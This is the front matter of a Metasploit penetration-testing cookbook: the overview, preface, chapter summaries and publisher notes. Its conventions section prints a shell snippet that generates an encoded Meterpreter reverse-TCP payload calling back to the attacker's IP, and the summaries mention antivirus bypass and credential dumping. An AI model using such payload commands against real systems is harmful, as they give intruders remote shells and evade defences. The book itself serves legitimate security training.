Metasploit Penetration Testing Cookbook, Second Edition

By: Monika Agarwal, Abhinav Singh

Overview of this book

Metasploit helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. Its capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports. The goal of the software is to give a clear picture of the critical vulnerabilities in an environment and to help manage those risks.

Metasploit Penetration Testing Cookbook, Second Edition is arranged in chapters of increasing complexity and covers Metasploit from the pre-exploitation to the post-exploitation phase. This edition updates the first edition's coverage from Metasploit 4.0 to version 4.5, and adds detailed penetration testing techniques for specialized targets such as wireless networks, VoIP systems, and the cloud.

The second edition covers a number of topics that were not part of the first edition: operating-system penetration testing now includes Windows 8, and new chapters take you from wireless and VoIP networks through to the cloud.

The book starts with the basics, such as gathering information about your target, and builds up to advanced topics such as building your own framework scripts and modules. It goes deep into operating-system-based penetration testing techniques and then moves on to client-side exploitation. In the post-exploitation phase, it covers Meterpreter, antivirus bypass, Ruby wonders, exploit building, porting exploits to the framework, and penetration testing of VoIP, wireless networks, and cloud computing.

This book will help readers think from an attacker's perspective to dig out the flaws in target networks, and to leverage the power of Metasploit to compromise them. It will take your penetration testing skills to the next level.
Table of Contents (18 chapters)
Metasploit Penetration Testing Cookbook, Second Edition
Credits
About the Authors
About the Reviewers
www.PacktPub.com
Preface
Index

Preface

Welcome to Metasploit Penetration Testing Cookbook, Second Edition. This book covers various recipes for performing penetration testing over different platforms (including wireless networks and VoIP) using BackTrack 5 R3. The book starts with the basics of gathering information about your target and gradually covers advanced topics, such as building your own framework scripts and modules.

The book goes deep into operating-system-based penetration testing techniques and moves ahead with client-side exploitation methodologies. In the post-exploitation phase, it covers Meterpreter, antivirus bypassing, Ruby wonders, exploit building, porting exploits to the framework, and pentesting of VoIP and wireless networks, among others. This book will help readers think from an attacker's perspective, dig out the flaws in target networks, and leverage the power of Metasploit to compromise them. It will take your penetration testing skills to the next level. It covers advanced Meterpreter usage for token impersonation and WinAPI manipulation, ESPIA, the Incognito attack, injecting a VNC server remotely, exploiting vulnerable PHP applications, and much more.

It will help you set up a complete penetration testing environment using Metasploit and virtual machines; build and analyze Meterpreter scripts in Ruby; and pentest VoIP and WLAN targets from start to end, including the information gathering, vulnerability assessment, exploitation, and privilege escalation phases. You will become familiar with client-side exploitation techniques, with detailed analysis of the vulnerabilities and code involved.

What this book covers

Chapter 1, Metasploit Quick Tips for Security Professionals, includes quick recipes, such as Configuring Metasploit on Windows, Configuring Metasploit on Ubuntu, Installing Metasploit with BackTrack 5 R3, Setting up the penetration testing using VMware, Setting up Metasploit on a virtual machine with SSH connectivity, Installing and configuring PostgreSQL in BackTrack 5 R3, Using the database to store the penetration testing results, and Working with BBQSQL.

Chapter 2, Information Gathering and Scanning, adds port scanning in a distributed environment to the material from the previous edition. Several other scanning techniques, including SMB, SSH, FTP, and SNMP sweeping, are also explained in this chapter.

Chapter 3, Operating-System-based Vulnerability Assessment, covers operating systems such as Windows XP, Ubuntu, and the very fascinating Windows 8, with quick tips on exploit usage. It also discusses Windows DLL injection flaws.

Chapter 4, Client-side Exploitation and Antivirus Bypass, elaborates on the latest vulnerabilities in Internet Explorer, Adobe Flash Player, and Microsoft Word. Because payloads encoded with msfencode are now widely detected by antivirus products, the chapter follows up with the Syringe utility, which achieves a lower detection ratio than msfencode.

Chapter 5, Working with Modules for Penetration Testing, covers all the basics of working with modules for penetration testing, such as Working with scanner auxiliary modules, Working with auxiliary admin modules, SQL injection and DoS attack modules, Post-exploitation modules, Understanding the basics of module building, Analyzing an existing module, and Building your own post-exploitation module.

Chapter 6, Exploring Exploits, shows readers how to convert a standalone exploit into a framework module and, finally, how to write their own fuzzer.

Chapter 7, VoIP Penetration Testing, discusses VoIP penetration testing in detail, along with VoIP topologies. It walks through the process step by step, ending in exploitation using VLAN hopping, VoIP MAC spoofing, impersonation attacks, and DoS attacks.

Chapter 8, Wireless Network Penetration Testing, includes Setting up and running Fern WiFi Cracker, Sniffing interfaces with tcpdump, Cracking WEP and WPA with Fern WiFi Cracker, Session hijacking via a MAC address, Locating a target's geolocation, war driving, evil twin attack, and Karmetasploit.

Chapter 9, Social-Engineer Toolkit, explains social engineering, the act of manipulating people into performing actions they did not intend to. A cyber-based social engineering scenario is designed to trap a user into performing activities that can lead to the theft of confidential information or other malicious activity. Just as we have exploits for vulnerabilities in software and operating systems, SET is a generic toolkit for exploiting the human element and bypassing a user's own security awareness.

Chapter 10, Working with Meterpreter, covers the commands available in Meterpreter. It also uses Meterpreter to view traffic on remote machines and to dump usernames and passwords. Token impersonation and WinAPI manipulation, ESPIA usage, the Incognito attack, injecting a VNC server remotely, and exploiting a vulnerable PHP application are key additions to this chapter.

Appendix, Pentesting in the Cloud, introduces cloud computing as a form of distributed computing over a network, with the ability to run a program on many connected machines simultaneously. It then explains pentesting in the cloud, and how to pentest a cloud environment with hackerserver.com.

What you need for this book

To perform the various recipes mentioned in this book, you will need the following:

  • Attacker machine: BackTrack 5 R3

  • Victim machine: Windows XP (SP2/SP3), Windows 7, Windows 8, or Ubuntu

  • Software: Almost all the software mentioned in the book is included in BackTrack 5 R3; where a tool is not, the book gives its download link.

Who this book is for

This book targets both professional penetration testers and new users of Metasploit who wish to gain expertise in the framework, along with pentesting skills that are not limited to a particular OS. It requires basic knowledge of scanning, exploitation, and the Ruby language.

Conventions

In this book, you will find a number of styles of text that distinguish between different kinds of information. Here are some examples of these styles, and an explanation of their meaning.

Code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles are shown as follows: "The Nslookup command has revealed further information about the target, such as its IP address, server IP, and so on."

A block of code is set as follows:

# Interface to listen on, and the attacker's IP address on that interface
export interface=eth0
export ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')
# Pick a random listening port for the reverse connection
export port=$(shuf -i 2000-65000 -n 1)
echo -e "\e[01;32m[>]\e[00m Generating payload..."
# Generate a raw Meterpreter reverse_tcp payload and alphanumeric-encode it for x86
payload=$(msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=$port LHOST=$ourIP R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX)

Any command-line input or output is written as follows:

chmod +x metasploit-latest-linux-x64-installer.run
You will get the text of the license in a bunch of pages, then:
Do you accept this license? [y/n]: y
Select a folder [/opt/metasploit]:
Install Metasploit as a service? [Y/n]:
Service script name: [metasploit]:
SSL Port [3790]:

New terms and important words are shown in bold. Words that you see on the screen, in menus or dialog boxes, for example, appear in the text like this: "To launch Metasploit from the Applications menu, go to Applications | BackTrack | Exploitation Tools | Network Exploitation Tools | Metasploit Framework."

Note

Warnings or important notes appear in a box like this.

Tip

Tips and tricks appear like this.

Reader feedback

Feedback from our readers is always welcome. Let us know what you think about this book—what you liked or may have disliked. Reader feedback is important for us to develop titles that you really get the most out of.

To send us general feedback, simply send an e-mail to , and mention the book title via the subject of your message.

If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, see our author guide on www.packtpub.com/authors.

Customer support

Now that you are the proud owner of a Packt book, we have a number of things to help you to get the most from your purchase.

Downloading the example code

You can download the example code files for all Packt books you have purchased from your account at http://www.packtpub.com. If you purchased this book elsewhere, you can visit http://www.packtpub.com/support and register to have the files e-mailed directly to you.

Errata

Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you find a mistake in one of our books—maybe a mistake in the text or the code—we would be grateful if you would report this to us. By doing so, you can save other readers from frustration and help us improve subsequent versions of this book. If you find any errata, please report them by visiting http://www.packtpub.com/submit-errata, selecting your book, clicking on the errata submission form link, and entering the details of your errata. Once your errata are verified, your submission will be accepted and the errata will be uploaded on our website, or added to any list of existing errata, under the Errata section of that title. Any existing errata can be viewed by selecting your title from http://www.packtpub.com/support.

Piracy

Piracy of copyright material on the Internet is an ongoing problem across all media. At Packt, we take the protection of our copyright and licenses very seriously. If you come across any illegal copies of our works, in any form, on the Internet, please provide us with the location address or website name immediately so that we can pursue a remedy.

Please contact us at with a link to the suspected pirated material.

We appreciate your help in protecting our authors and our ability to bring you valuable content.

Questions

You can contact us at if you are having a problem with any aspect of the book, and we will do our best to address it.